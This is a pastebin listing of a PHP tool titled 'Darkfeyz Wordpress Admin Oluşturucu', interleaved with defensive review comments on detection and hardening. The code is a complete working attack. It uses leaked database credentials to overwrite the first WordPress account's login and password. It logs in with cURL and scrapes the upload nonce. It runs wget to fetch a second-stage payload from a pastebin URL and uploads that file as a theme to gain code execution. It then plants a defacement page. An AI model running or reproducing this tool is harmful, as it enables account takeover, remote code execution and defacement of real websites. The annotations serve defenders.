
Darkfeyz Wordpress Admin Oluşturucu

a guest
Apr 15th, 2016
  1. <?php
  2.  
  // Review note (defensive annotation; the code itself is unchanged).
  // This branch runs on any POST request. It only works with valid MySQL
  // credentials for a WordPress database, so it is a post-compromise tool: the
  // credentials must already have leaked (they look like the values a
  // wp-config.php holds - inferred, not shown on this page).
  3. if($_POST){
  // Every value is copied from the request as-is. Nothing is validated or escaped
  // before it reaches the SQL strings and echo statements below.
  4. $host = $_POST['host'];
  5. $username = $_POST['username'];
  6. $password = $_POST['password'];
  7. $db = $_POST['db'];
  8. $dbprefix = $_POST['dbprefix'];
  9. $user_baru = $_POST['user_baru'];
  10. $password_baru = $_POST['password_baru'];
  // Fully qualified table names: <db>.<prefix>users and <db>.<prefix>options.
  11. $prefix = $db.".".$dbprefix."users";
  12. $sue = $db.".".$dbprefix."options";
  13. $tanya = $_POST['tanya'];
  14. $target = $_POST['target'];
  15. $nick = $_POST['nick'];
  // Unsalted MD5 of the new password; this is what gets written to user_pass.
  // Detection hint: a bare 32-hex-digit user_pass value stands out next to the
  // prefixed hash formats WordPress normally stores (confirm for the site's version).
  16. $pass = md5("$password_baru");
  17.  
  18.  
  // Legacy mysql_* extension (removed in PHP 7.0), which dates the sample to
  // PHP 5-era hosts. The die() messages are returned to the operator verbatim.
  19. mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
  20. mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
  21.  
  // Only the first row is read, i.e. the account with the lowest ID
  // (usually the original administrator - assumption, verify per site).
  22. $tampil=mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  23. $r=mysql_fetch_array($tampil);
  24. $id = $r[ID];
  25.  
  // First options row by option_id; its option_value replaces the POSTed $target.
  // Presumably this is the site URL on a default install - TODO confirm.
  26. $tampil2=mysql_query("SELECT * FROM $sue ORDER BY option_id ASC");
  27. $r2=mysql_fetch_array($tampil2);
  28. $target = $r2[option_value];
  // Database content is echoed into the HTML response without escaping.
  29. echo "# $target<br>";
  30.  
  31.  
  // Overwrites the login name AND password hash of that existing account. No new
  // user is created, despite the page title. The previous user_login is not saved
  // anywhere, so recovery needs a backup or a database audit log.
  // Incident response: diff the users table against a known-good backup, rotate
  // the database credentials, and invalidate existing sessions.
  32. mysql_query("UPDATE $prefix SET user_pass='$pass',user_login='$user_baru' WHERE ID='$id'");
  33.  
  34.  
  35.  
  36.  
  // Optional second stage, entered only when the POSTed "tanya" value equals "y".
  37. if($tanya=="y"){
  38.  
  // ambilKata: string helper that returns the text of $param located between the
  // first occurrence of $kata1 and the next occurrence of $kata2 after it.
  // Returns FALSE when either marker is absent from $param.
  // Used further down to scrape a _wpnonce value out of an HTML response.
  39. function ambilKata($param, $kata1, $kata2){
  40. if(strpos($param, $kata1) === FALSE) return FALSE;
  41. if(strpos($param, $kata2) === FALSE) return FALSE;
  // Start just past the opening marker; search for the closing marker from there.
  42. $start = strpos($param, $kata1) + strlen($kata1);
  43. $end = strpos($param, $kata2, $start);
  44. $return = substr($param, $start, $end - $start);
  45. return $return;
  46. }
  47.  
  // anucurl: fetches $sites with cURL and returns the response body.
  // Not called anywhere in the visible listing.
  // Detection-relevant traits shared with the other requests in this script:
  //  - fixed User-Agent string (Firefox/32.0 on Windows NT 6.1)
  //  - cookies persisted to a file named "coker_log" in the working directory
  //  - TLS peer and host verification both disabled
  48. function anucurl($sites){
  49. $ch1 = curl_init ("$sites");
  50. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  51. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  53. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  // Certificate and hostname checks are switched off, so any certificate is accepted.
  54. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  55. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  56. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  57. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  // The handle is never closed in this function.
  58. $data = curl_exec ($ch1);
  59. return $data;
  60. }
  61.  
  // lohgin: POSTs the WordPress login form fields to $cek and returns the response body.
  //   $cek   - URL the form is posted to
  //   $web   - site base URL, used only to build redirect_to
  //   $userr - login name, $pass - clear-text password
  // The session cookies end up in the "coker_log" file and are reused by later requests.
  // For log review: the request carries a fixed User-Agent, rememberme=forever and
  // testcookie=1, with TLS verification disabled on the client side.
  62. function lohgin($cek, $web, $userr, $pass){
  63. $post = array(
  64. "log" => "$userr",
  65. "pwd" => "$pass",
  66. "rememberme" => "forever",
  67. "wp-submit" => "Log In",
  68. "redirect_to" => "$web/wp-admin/",
  69. "testcookie" => "1",
  70. );
  71. $ch = curl_init ("$cek");
  72. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  73. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  74. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  75. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  76. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  77. curl_setopt ($ch, CURLOPT_POST, 1);
  78. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  79. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  80. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  // The handle is never closed in this function.
  81. $data6 = curl_exec ($ch);
  82. return $data6;
  83. }
  84.  
  // Second stage (defensive annotation; code unchanged): using the account that was
  // just overwritten, log in to the dashboard, push a PHP file through the theme
  // uploader, then use that file to place a defacement page.
  // Artifacts left in the directory the script runs from: "coker_log",
  // "raw.php?i=mEQP6prW", "m.php" and "wew.php".
  // Hardening that removes this path: deny PHP execution under wp-content/uploads
  // and set DISALLOW_FILE_MODS in wp-config.php so the dashboard cannot install themes.
  85. $site= "$target/wp-login.php";
  86. $site2= "$target/wp-admin/theme-install.php?upload";
  // The first call logs in. The second sends the same form to the theme-upload page
  // and keeps the response so the nonce can be scraped from it.
  87. $a = lohgin($site, $target, $user_baru, $password_baru);
  88. $b = lohgin($site2, $target, $user_baru, $password_baru);
  89.  
  90.  
  // Extracts the _wpnonce hidden-field value; FALSE if the markers are not found.
  91. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  92. echo "# token -> $anu2<br>";
  93.  
  94.  
  // Shells out to fetch a second-stage payload from a paste site and copies it to
  // m.php. The payload's content is not part of this page.
  // Detection: a web-server user spawning wget/cp, and outbound requests from a
  // web server to paste sites, are both strong signals.
  95. system('wget http://pastebin.com/raw.php?i=mEQP6prW');
  96. system('cp raw.php?i=mEQP6prW m.php');
  97.  
  // Theme-upload form submission carrying the scraped nonce and m.php as the "theme".
  98. $post2 = array(
  99. "_wpnonce" => "$anu2",
  100. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  101. "themezip" => "@m.php",
  102. "install-theme-submit" => "Install Now",
  103. );
  104. $ch = curl_init ("$target/wp-admin/update.php?action=upload-theme");
  105. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  106. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  107. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  108. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  109. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  110. curl_setopt ($ch, CURLOPT_POST, 1);
  111. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  112. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  113. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  // The response is stored but never inspected, so success is not checked here.
  114. $data3 = curl_exec ($ch);
  115.  
  // Writes the operator-supplied "nick" text to wew.php; the file handle is never closed.
  116. $namafile = "wew.php";
  117. $fp2 = fopen($namafile,"w");
  118. fputs($fp2,$nick);
  119.  
  120. $y = date("Y");
  121. $m = date("m");
  122.  
  123.  
  // The script expects the uploaded m.php to be reachable, and executed as PHP,
  // under wp-content/uploads/<year>/<month>/, and posts wew.php to it as field "file3".
  // Detection: any .php file inside the uploads tree, and POST requests to one.
  124. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/m.php");
  125. curl_setopt($ch6, CURLOPT_POST, true);
  126. curl_setopt($ch6, CURLOPT_POSTFIELDS,
  127. array('file3'=>"@$namafile"));
  128. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  129. curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  130. $postResult = curl_exec($ch6);
  131. curl_close($ch6);
  132.  
  // Success check: fetch <site>/k.php and look for the word "hacked" (case-insensitive).
  // A k.php in the web root containing that marker is therefore an indicator of compromise.
  133. $as = "$target/k.php";
  134. $bs = file_get_contents($as);
  135. if(preg_match("#hacked#si",$bs)){
  136. echo "# <font color='green'>Basarılı...</font><br>";
  137. echo "# $target/k.php<br>";
  138. }
  139. else{
  // Fallback output: prints the new login name and clear-text password, unescaped.
  140. echo "# <font color='red'>Basarısız...</font><br>";
  141. echo "# Manuel Deneyin: <br>";
  142. echo "# $target/wp-login.php<br>";
  143. echo "# admin: $user_baru<br>";
  144. echo "# sifre: $password_baru<br>";
  145.  
  146.  
  147. }
  148.  
  149.  
  150.  
  151.  
  152. }
  153.  
  154. elseif($tanya=="n"){
  // Credential overwrite only: reports the new login name and clear-text password.
  // Both values come straight from the request and are echoed without escaping.
  155. echo "# Basarılı<br>";
  156. echo "# KullanıcıAdı: $user_baru<br>";
  157. echo "# Sifre: $password_baru<br>";
  158. }
  159.  
  160.  
  161.  
  162. }else{
  // No POST data: render the operator form. It collects database credentials, the
  // replacement login and password, and the defacement text, all as plain text inputs.
  // The fixed title string below is a usable content signature when sweeping a
  // web root for copies of this file.
  163. echo '<html>
  164. <head>
  165. <title>Wordpress Yeni Admin Oluşturucu</title>
  166. </head>
  167.  
  168. <body>
  169. <center>
  170. <center><div id="button"></div>
  171. <h2>Wordpress Yeni Admin Oluşturucu</h2>
  172. <table>
  173. <tr><td><form method="post" action="?action"></td></tr>
  174. <tr><td><input type="text" name="Localhost" placeholder="localhost"></td></tr>
  175. <tr><td><input type="text" name="username" placeholder="DB Kullanıcı Adı"></td></tr>
  176. <tr><td><input type="text" name="password" placeholder="DB Şifre"></td></tr>
  177. <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  178. <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  179. <tr><td><input type="text" name="user_baru" placeholder="Yeni Kullanıcı Adı"></td></tr>
  180. <tr><td><input type="text" name="password_baru" placeholder="Yeni Şifre"></td></tr>
  181. <tr><td>Oto Deface<input type="radio" name="tanya" value="evet"> y <input type="radio" name="tanya" value="hayır"> n</td></tr>
  182.  
  183. <tr><td><input type="text" name="nick" placeholder="Hacked By Darkfeyz"></td></tr>
  184. <tr><td><input type="submit" value="Değiştir"></td></tr>
  185. </table>
  186. Kodlardaki hacked by darkfeyz yerini kendi nickinizle değiştirmeyi unutmayında
  187. </center>
  188. </body>';
  189. }
  190.  
  191. ?>